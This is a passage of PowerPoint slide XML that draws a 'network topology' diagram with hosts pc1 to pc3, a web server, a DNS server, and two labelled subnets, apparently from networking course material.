                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AECED175-3B47-8767-9F8A-EA43A3780EBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9287" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6764107" y="1822409"/>
            <a:ext cx="20032" cy="6474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298" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DED0F17-13AB-A80D-C759-1B3CD5D5B9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="3033869"/>
            <a:ext cx="3526369" cy="265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9297" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DE2F2B2-C79E-EB8B-0478-9D24FC383EBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3799212" y="3881170"/>
            <a:ext cx="1286124" cy="6713"/>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55" name="Connettore diritto 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60ABC099-882C-AD78-A3E0-F0E4422002FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5217619" y="5309001"/>
            <a:ext cx="7414" cy="6154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Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D99FC73-99B6-AFEB-4845-4C4C759E6563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7403649" y="1891613"/>
            <a:ext cx="20032" cy="460633"/>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39" name="Connettore diritto 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{705D1311-A8A4-6974-A0CE-CFA6DC95F67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5691343" y="1822409"/>
            <a:ext cx="5866" cy="6358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A74E92B9-FCBA-AEDE-4795-C39EE76C2FAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4763186" y="1841489"/>
            <a:ext cx="0" cy="6023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D6F98BBA-C24C-BA52-858C-ACDDFB6A9BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3821141" y="1834146"/>
            <a:ext cx="0" cy="5992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220" name="Rectangle 145">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70203AD6-32A1-48F1-4AEE-2AC08BF68D73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>network topology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E2A1696-8396-2433-74ED-9B3865127A05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0EC48F8-7279-733A-5DFC-F7A308A69721}"/>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2" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{171C2D46-F67E-0837-46FA-06C3A32AEFEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3532746" y="1220690"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{016833DC-BFD9-101F-2CD6-1CBAFC4914D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106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55A7DE0-100B-B136-6060-9D434B8CB038}"/>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pc1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0E64715-7D84-4866-3617-5A52E9785706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4474791" y="1228033"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4E21FD8-6304-243A-8781-49C37F83DBC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106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF273C0D-428A-176D-D389-71D2C87D5A86}"/>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pc2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01242D0E-0136-0636-E77A-B28EC0236F67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1518965" y="5559356"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB1146B8-731C-B225-CDA0-F5ED73C6487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106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0219749-6F64-E988-22D1-1157A4EF1C10}"/>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pc3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56233DFF-F677-2435-BA0E-CC9A8A21069B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3440447" y="2446573"/>
            <a:ext cx="3852857" cy="2332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12" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB45487B-D21D-D807-F03E-3D173E880CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7293304" y="2363536"/>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A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{028E6805-6B4D-2CDD-D0A7-F12D88505405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657018" y="1972871"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E2EBF58-6664-00F2-DD21-6E4A88C9A61A}"/>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eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF92FD94-40CA-6605-CFEC-0980DCCDAEF8}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E904A6F0-DA6F-0B90-1AA5-D7E44D0EFA03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4597668" y="1958829"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2816ADB-3663-7BA0-220C-0AB272BFF378}"/>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18" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23BBB09F-2A1F-0236-F708-1AC3AE097AF9}"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Gruppo 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{981468B3-1362-1D2F-A41C-88C210D62E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5243610" y="1227608"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7727EBF-B646-34BB-AA42-94B88427DC41}"/>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uniromatre</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2D1C5A-AEF3-057D-E851-A7B73EEB89EE}"/>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34" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B4384A-D7EC-1B49-F6FA-C9484237E306}"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9839823-C4D2-1295-E957-192D54300232}"/>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WEB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B0ABA12-2765-85C0-113F-3CA6D0040816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5525825" y="1967277"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56CF7C12-094E-6E2B-78F9-C7D30B168E38}"/>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38" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8992BF67-C320-B6B0-A255-107054E62E41}"/>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50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Gruppo 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5881B4C4-5037-1CBA-F24E-BEFC7C0AFCD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2150227" y="4015813"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F5A3E37-2960-6EFE-571B-80BB13611411}"/>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42" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9934BB73-3678-9B7B-320D-6BBA87C2EF57}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B471989-6097-D76D-E61B-0D7495CA3B1A}"/>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DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4865F66-10D8-627C-198D-D8CB1B7807BA}"/>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dnsit</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58B76A8B-868B-21CB-AFC3-6766F538FC3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6598589" y="1968796"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC104CF2-F878-B6F4-68AE-D68D58C53953}"/>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47" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E4A3A0F-5C54-6AF2-90C2-3108D77F18D5}"/>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
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0D29176-7F5B-0EEC-098D-4A480AD9317E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7373670" y="1644027"/>
            <a:ext cx="114646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110.0.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{390E9EBE-B486-CD88-B28D-DCE141583775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4346573" y="5294208"/>
            <a:ext cx="1756921" cy="2332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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B222C9C1-095A-3A71-2CCE-75CCB09EFFC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5069517" y="5457813"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A23DA842-213D-DF7C-ECA3-29C00E7B5555}"/>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54" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B3B2F4A-F2E6-38C3-53A9-CDA442BE2928}"/>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
        <p:nvSpPr>
          <p:cNvPr id="57" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{023C69C6-65E7-5DFC-D5DD-97AE1D45FDB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4135015" y="5183863"/>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B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A7193B7-AA32-52C6-7F95-A2AA78B3247B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3008088" y="4654593"/>
            <a:ext cx="114646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200.1.1.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA5A5CE-617D-974C-FE11-51C51511BC2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712201" y="4908509"/>
            <a:ext cx="442355" cy="397361"/>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61" name="Straight Connector 327">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FB79E05-27B5-596A-CD02-5B9286EC28B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5152303" y="2469897"/>
            <a:ext cx="49830" cy="28359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227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B98C03-E2E5-BC7B-3D92-4DD909DD45FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4911658" y="2892462"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9216" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{828A1D90-5107-8BB9-AEA4-AE72BB4174E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
